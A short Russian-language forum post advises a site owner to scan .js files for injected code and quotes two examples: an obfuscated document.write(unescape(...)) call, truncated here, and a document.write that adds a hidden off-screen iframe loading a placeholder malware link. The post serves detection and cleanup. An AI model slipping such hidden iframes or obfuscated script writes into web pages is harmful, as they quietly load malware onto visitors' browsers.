Владельцу сайта посоветую проверить все файлы сайта с расширением .js на наличие постороннего кода вида:
Исходный код
;document.write(unescape(""%3C%73%63%72%..........3E%09"));
или
Исходный код
;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://ссылка_на_зловреда" height="500" width="500"></iframe>');
Но, варианты могут быть разные... Данный код всего лишь пример. Сам сталкивался с подобным.